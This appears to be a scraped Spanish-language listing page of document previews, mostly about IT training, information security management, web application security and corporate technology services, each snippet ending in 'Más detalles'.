Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales
Más detallesCertool es la solución informática desarrollada por AENOR para la gestión eficaz de los sistemas.
Índice de contenido 1. Qué es Certool... 2 2. Características... 3 3. Soluciones y funcionalidades... 4 3.1. Funcionalidades del módulo principal... 4 3.2. Funcionalidades de los módulos complementarios...
Más detalles1. Instala sistemas operativos en red describiendo sus características e interpretando la documentación técnica.
Módulo Profesional: Sistemas operativos en red. Código: 0224. Resultados de aprendizaje y criterios de evaluación. 1. Instala sistemas operativos en red describiendo sus características e interpretando
Más detallesGestión de Seguridad en canales electrónicos. Ing. Jorge O Higgins, CISSP
Gestión de Seguridad en canales electrónicos Ing. Jorge O Higgins, CISSP Contenido 1. Objetivos de seguridad en el ambiente financiero 2. Definición de requerimientos de seguridad 3. Seguridad como proceso
Más detallesFORMACIÓN Administración del sistema operativo en sistemas ERP-CRM
FORMACIÓN Administración del sistema operativo en sistemas ERP-CRM En un mercado laboral en constante evolución, la formación continua de los profesionales debe ser una de sus prioridades. En Galejobs
Más detallesLa innovación como valor diferencial. Las TIC, vehículo de transformación
Perfil corporativo La innovación como valor diferencial Informática El Corte Inglés es una compañía especializada en proveer servicios de consultoría tecnológica, soluciones TIC y outsourcing a grandes
Más detallesDE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES
UF1893 Instalación y Parametrización del Software (Online) TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES UF1893 Instalación y Parametrización del
Más detallesPolíticas para Asistencia Remota a Usuarios
Políticas para Asistencia Remota a I. OBJETIVO La presente política tiene como objetivo establecer las pautas, condiciones, responsabilidades y niveles de seguridad correspondientes en el uso de la herramienta
Más detallesUF1885 Administración del Sistema Operativo en Sistemas ERP-CRM (Online)
UF1885 Administración del Sistema Operativo en Sistemas ERP-CRM (Online) TITULACIÓN DE FORMACIÓN CONTINUA BONIFICADA EXPEDIDA POR EL INSTITUTO EUROPEO DE ESTUDIOS EMPRESARIALES UF1885 Administración del
Más detallesCURSO COORDINADOR INNOVADOR
CURSO COORDINADOR INNOVADOR PRESENTACIÓN La tarea que el Ministerio de Educación se propone a través de Enlaces, en relación al aseguramiento del adecuado uso de los recursos, con el fin de lograr un impacto
Más detallesPrograma de Universidades
University Program International Univer- sities Certified Universities Programa de Universidades Qué es iflowbpm? Tabla de Contenidos Que és iflowbpm? 1 Por qué BPM en las universidades? 2 Beneficios de
Más detallesPERFIL TÉCNICO ANALISTA-PROGRAMADOR
PLIEGO DE PRESCRIPCIONES TÉCNICAS PARA LA CONTRATACIÓN DE LA CONSULTORÍA Y ASISTENCIA PARA LOS PROYECTOS WEB EN EL TRIBUNAL CONSTITUCIONAL PERFIL TÉCNICO ANALISTA-PROGRAMADOR 1 Índice Antecedentes... 3
Más detalles1. Objetivos generales del título
1. Objetivos generales del título a) Organizar los componentes físicos y lógicos que forman un sistema microinformático, interpretando su documentación técnica, para aplicar los medios y métodos adecuados
Más detallesPRESENTACIÓN ENISE. Versión 2.8
PRESENTACIÓN ENISE Versión 2.8 Índice de la Jornada 1. El Instituto Nacional de las Tecnologías de la Comunicación, INTECO 2. El Centro de Respuesta a Incidentes de Seguridad para la PYMES y el Ciudadano,
Más detallesI. E. S. Cristóbal de Monroy. DEPARTAMENTO: Informática. MATERIA: Aplicaciones Web. NIVEL: 2º Sistemas Microinformáticos y Redes
DEPARTAMENTO: Informática MATERIA: Aplicaciones Web NIVEL: 2º Sistemas Microinformáticos y Redes 1. Objetivos. Competencias Profesionales, Personales y Sociales 1.1 Objetivos del ciclo formativo Según
Más detallesANALITICS21 ENCARGADO DE SEGURIDAD INFORMÁTICA Y SOFTWARE DE APOYO. Una Nube de servicios especializados para el futuro
Una Nube de servicios especializados para el futuro ANALITICS21 ENCARGADO DE SEGURIDAD INFORMÁTICA Y SOFTWARE DE APOYO EXPERIENCIA E INNOVACIÓN ORIENTADAS A SEGURIDAD DE LA INFORMACIÓN Muchas empresas
Más detallesMedia en España. USOS Personas que han -2% comprado a través de Internet en los últimos. 3 meses
murcia (Región de) brecha digital de género Personas que hacen uso de Internet según tipo de uso y sexo. Murcia (Región de) 2011 (%) Brecha digital de género. Murcia (Región de) 2011 (%) Media en España
Más detallesConvocatoria para formador Laboratorio de Emprendimiento Social PRESCRIPCIONES TÉCNICAS
Convocatoria para formador Laboratorio de Emprendimiento Social PRESCRIPCIONES TÉCNICAS Términos de Referencia para la facilitación de un proceso formativo sobre Emprendimiento Social dirigido a jóvenes,
Más detallesDesarrollo seguro en Drupal. Ezequiel Vázquez De la calle
Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal
Más detallesResolución N 00759 del 26 de febrero de 2008
UNIDAD ADMINISTRATIVA ESPECIAL DE AERONÁUTICA CIVIL MANUAL ESPECÍFICO DE FUNCIONES Y DE COMPETENCIAS LABORALES I. IDENTIFICACIÓN Denominación del empleo Profesional Aeronáutico IV Nivel 33 Grado 30 No.
Más detallesCapítulo IV SEGURIDAD DE LA INFORMACIÓN ROLES Y ESTRUCTURA ORGANIZACIONAL
Capítulo IV SEGURIDAD DE LA INFORMACIÓN ROLES Y ESTRUCTURA ORGANIZACIONAL 4.1 Situación actual La administración de seguridad de información se encuentra distribuida principalmente entre las áreas de sistemas
Más detallesSoftware Libre en un entorno de calidad y confianza. 23 Abril 2008
1 Promoción del desarrollo del Software Libre en un entorno de calidad y confianza 2 VULCANO: Promoción del desarrollo del Software Libre en un entorno de calidad y confianza Telecoforum Clara Pezuela,
Más detallesChequesTIC para las Empresas Extremeñas. Acciones subvencionadas del 80% con un tope de hasta 5.000 por empresa.
ChequesTIC para las Empresas Extremeñas. Acciones subvencionadas del 80% con un tope de hasta 5.000 por empresa. El Consejo de Gobierno autorizó la convocatoria de ayudas destinadas a incentivar el uso
Más detalles1. INFORMACIÓN GENERAL
1. INFORMACIÓN GENERAL TÍTULO Sistemas Microinformáticos y redes FAMILIA PROFESIONAL Informática y comunicaciones DURACIÓN 2.000 horas = 1.650 online + 350 en centros de trabajo QUIÉN PUEDE HACER ESTE
Más detallesIRONWALL Grupo MNEMO. Fernando García Vicent Director General. Zona para Logotipo organización (es)
Seguridad para la Sede Electrónica y los Procedimientos Electrónicos en un entorno interoperable T16: Esquema Nacional de Interoperabilidad (2ª parte) 26/10/2010 Fernando García Vicent Director General
Más detallesINFOTEC Centro de Investigación e Innovación en Tecnologías de la Información y Comunicación
INFOTEC Centro de Investigación e Innovación en Tecnologías de la Información y Comunicación El término cloud computing hace referencia a una concepción tecnológica y a un modelo de negocio que reúne ideas
Más detallesSOCINFO 2014, Bilbo. Reinventando IZFE, S.A.
SOCINFO 2014, Bilbo Reinventando IZFE, S.A. Por qué un Plan Estratégico? Presupuestos descentralizados Falta de visión transversal Ineficiencia en la generación y uso de soluciones tecnológicas Demanda
Más detallessistemas de gestión isocloud Herramienta de Gestión de Calidad y Medio Ambiente para Pymes indracompany.com
sistemas de gestión isocloud Herramienta de Gestión de Calidad y Medio Ambiente para Pymes indracompany.com es una herramienta de Gestión de Calidad y Medio Ambiente para Pymes. Los sistemas de calidad
Más detallesComunicación Integrada para una Sociedad Digital
Comunicación Integrada para una Sociedad Digital Pilar Aranda Ramírez Catedrática de Universidad Aspiro a ser la próxima Rectora de la Universidad de Granada La Universidad de Granada, ante esta nueva
Más detallesDiagnóstico acerca de la situación de la calidad de software en la industria española
del Ignacio Caño Luna, INTECO Diagnóstico acerca de la situación de la calidad de software en la industria española Índice 1. INTECO Calidad del 2. Laboratorio Nacional de Calidad del 3. Diagnóstico Calidad
Más detallesGESTION WEB. FUNDAMENTACIÓN:
GESTION WEB. FUNDAMENTACIÓN: Las Administraciones Públicas están implicadas en una serie de profundos cambios y transformaciones, con los que, pretenden mejorar la prestación de servicios públicos introduciendo
Más detallesUSO DE EXCEL Y ACCESS PARA EL DESARROLLO DE APLICACIONES ADMINISTRATIVAS EMPRESARIALES
Nota: En el link Envió Actividades de la plataforma de curso, debe enviar las actividades descritas a continuación teniendo en cuenta que por cada actividad deberá crear un documento en Word donde cada
Más detalles